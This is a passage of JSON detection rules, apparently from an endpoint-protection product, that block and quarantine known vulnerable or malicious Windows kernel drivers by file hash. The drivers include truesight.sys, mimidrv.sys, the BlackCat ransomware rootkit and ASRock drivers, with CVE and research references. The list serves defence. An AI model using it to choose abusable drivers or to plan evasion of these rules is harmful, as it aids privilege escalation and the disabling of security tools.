(aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e273a147-e68e-5a83-abb0-e9b4e38b4aa0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.482122Z", + "creation_date": 
"2026-03-23T11:45:31.482127Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.482136Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "c052dc397f7511e3efe9ca222a43aa2b23a4d7e0919236dcbfafef1ebbb42d55", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e27d1beb-34e6-5912-b81e-aab112a892a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.981957Z", + "creation_date": "2026-03-23T11:45:29.981960Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.981966Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3a95cc82173032b82a0ffc7d2e438df64c13bc16b4574214c9fe3be37250925e", + "comment": "Vulnerable Kernel Driver (aka TGSafe.sys) [https://www.loldrivers.io/drivers/ad693146-4adf-4407-bb20-f2505e34c226/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e27e832f-c988-5829-9bf0-c3cc6899bc3f", + 
"test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.985521Z", + "creation_date": "2026-03-23T11:45:29.985523Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.985529Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "0bec69c1b22603e9a385495fbe94700ac36b28e5", + "comment": "Malicious BlackCat/ALPHV Ransomware Rootkit (aka fgme.sys, ktes.sys, kt2.sys and ktgn.sys) [https://www.trendmicro.com/en_us/research/23/e/blackcat-ransomware-deploys-new-signed-kernel-driver.html] [file SHA1]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e288ee5e-f8d9-58f6-a965-344e85b4f4a5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.826728Z", + "creation_date": "2026-03-23T11:45:30.826730Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": 
"2026-03-23T11:45:30.826736Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "f24b7c60fa8ca31d84525aa5bb83390a27221a4699e9013cb2d2bfe309cc233b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e28da84a-7eff-536e-a1cf-bd52ea37fbf1", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.974818Z", + "creation_date": "2026-03-23T11:45:29.974820Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.974826Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "81c301c77dbfff44567165139e9a5ee3af2aee838298451c7075dc6e1aae489f", + "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e2e004d6-948b-56b6-a67f-b422fa79aaa0", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + 
"effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.487469Z", + "creation_date": "2026-03-23T11:45:31.487471Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.487477Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "66394d18086f41b56ea4b0ef6292204274c2effc63247934a4b2bf5f9a583d7b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e30ab370-8d90-5e40-8216-01249ab22bb2", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.459765Z", + "creation_date": "2026-03-23T11:45:30.459769Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.459777Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + 
"references": [], + "type": "hash", + "value": "1beb15c90dcf7a5234ed077833a0a3e900969b60be1d04fcebce0a9f8994bdbb", + "comment": "Vulnerable Kernel Driver (aka Driver7.sys) [https://www.loldrivers.io/drivers/9ca73d04-3349-4c16-9384-94c43335a031/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3251261-a83c-51ad-8a89-5b24a67cc2a3", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:32.144305Z", + "creation_date": "2026-03-23T11:45:32.144308Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:32.144318Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "fa96eca78a57b779fd398294ae2519b7c4fe9e4369e6e7fa5167aebbe6e0c09a", + "comment": "Malicious Kernel Driver (aka idmtdi.sys) [https://www.loldrivers.io/drivers/c2e98102-2055-48f0-9449-3e7a7f2c0ffe/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e32629ec-8c02-50fe-9457-71bccff6d1db", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + 
"origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.476083Z", + "creation_date": "2026-03-23T11:45:31.476087Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.476097Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "5c16a31bdd0b2163034d3b45dbe7e57ed733d4cc0fdedddc1dd5ca16bb9ebb05", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e334ef88-95ca-50b3-a0dc-2967a51fe2ff", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.613529Z", + "creation_date": "2026-03-23T11:45:29.613531Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.613536Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a60efb06feeb96bad4b8d814896609b6bda6f130464aa963a881a38a3f06b7cb", + "comment": "ASRock vulnerable drivers - Privilege Escalation (aka AsrDrv10X.sys) [CVE-2018-10709] [https://www.exploit-db.com/exploits/45716] [authentihash 
SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3363f98-d8e6-557c-8c91-7f0772b47f24", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.140267Z", + "creation_date": "2026-03-23T11:45:31.140269Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.140278Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7758ddbec387b671f9027f0feda7d34797ce9e92eebb3bde2087a4d4cab8aeb", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e33b69b6-fa1f-5abb-ae24-950ce83782bf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.836612Z", + "creation_date": "2026-03-23T11:45:30.836614Z", + "enabled": true, + "block_on_agent": true, + 
"quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.836620Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2e01fc93068d3447fcee27f4d41bfe607ccb0a23c80bf3accd5578de30623b7f", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e34249cf-8da0-5997-b98a-cc8c4d0b39cc", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.471104Z", + "creation_date": "2026-03-23T11:45:30.471108Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.471117Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "577e381b5d36faf15cde84ed59c51e2dcb65d90140848111429e1c8cfb0553f5", + "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e34366a5-f864-5021-bb90-411b356f146a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.491220Z", + "creation_date": "2026-03-23T11:45:31.491223Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.491230Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2b6a4ce32a2e97c1f093266abfb29344ce3fa67943623bbeef76f16500ac749d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3457e60-53e0-5e3c-92eb-22443a9d625f", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.983264Z", + "creation_date": "2026-03-23T11:45:29.983266Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.983271Z", + "rule_level": null, + "rule_level_override": null, 
+ "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "d7c683ef033ac2dc4dfa0dc61f39931f91c0e8fd19e613f664cb03e14112ef6e", + "comment": "Vulnerable Kernel Driver (aka DBUtilDrv2.sys) [https://www.loldrivers.io/drivers/bb808089-5857-4df2-8998-753a7106cb44/,https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e37d40f3-f9b7-5c2f-80d4-2e7a91f6ba2e", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.152778Z", + "creation_date": "2026-03-23T11:45:31.152781Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.152788Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "6bb4baa4a8a4b078d79cfd5121ed6ba35b52a59cfb76e975fa68ca4feb39228a", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e384213f-d380-5c64-a267-fb4d5916b9fe", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": 
"critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.481422Z", + "creation_date": "2026-03-23T11:45:31.481426Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.481436Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8ec96f1f1d48a9a6ed971de2bae57b37f5a4abe8e81e7376a9be53403f62582d", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e384b630-08b0-59b7-813f-c9a6b87b9418", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:30.474176Z", + "creation_date": "2026-03-23T11:45:30.474179Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:30.474188Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": 
"d8e3548efca46a3aceca747622881843b170225957cffeacfd149c25907ecf2d", + "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3951ebf-e1a1-5b92-9012-b0523f46d94a", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148364Z", + "creation_date": "2026-03-23T11:45:31.148366Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148372Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "2abf81a54f0c87e8a84aa3cc947670a7e0d0c4a22cc9b64435de29fc3139bd9b", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3972cdf-ddf3-5289-9c01-63c995afe505", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": 
"system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.968132Z", + "creation_date": "2026-03-23T11:45:29.968134Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.968140Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "8774638b1b77665496dde96f1016f498bd91c062a9133d4faef6feeb0b7778e7", + "comment": "Projector Rootkit malicious drivers (aka KB_VRX_deviced.sys) [https://twitter.com/struppigel/status/1551503748601729025] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3b1ba13-a439-56f7-84da-c56124cde439", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.148114Z", + "creation_date": "2026-03-23T11:45:31.148116Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.148121Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "3d23efbd84ed31fbb76a644d27553765f76725fbd97d02f9cdbc390ccb278bae", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) 
[https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3bc8849-22ad-5370-8d73-3a20875e7504", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.477451Z", + "creation_date": "2026-03-23T11:45:31.477455Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.477465Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "63142b7b40371b449f51a94b8fdfce02ab23e0b9b17539ffbc34caa03a8a3388", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3d329ba-1554-58e3-b9b1-5b2fafeb4fa7", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:31.485579Z", + "creation_date": 
"2026-03-23T11:45:31.485582Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:31.485592Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "a685c5633e5f84736ff0df187118feeafc957f8a41cfad02d121d380cf5e7e55", + "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": "e3e578e2-95d1-5810-9d1c-fc0a555bebbf", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "quarantine", + "effective_state": "quarantine", + "rule_effective_level": "critical", + "rule_effective_confidence": "moderate", + "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389", + "rule_level_overridden": false, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:29.611428Z", + "creation_date": "2026-03-23T11:45:29.611430Z", + "enabled": true, + "block_on_agent": true, + "quarantine_on_agent": true, + "endpoint_detection": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:29.611435Z", + "rule_level": null, + "rule_level_override": null, + "rule_confidence": null, + "rule_confidence_override": null, + "references": [], + "type": "hash", + "value": "72f9cb24cfa641876f34967b96244259f95987ef24d1d729c0e483b3eb9a2740", + "comment": "CPUID CPU-Z vulnerable driver (aka cpuz143_x64.sys) [CVE-2017-15302] [https://www.loldrivers.io/drivers/de003542-80e1-4aa0-9b99-ed8647a93a6e/] [authentihash SHA256]", + "source": "af44d792-eb22-4e3f-88d2-9d1584001389" +} +{ + "id": 
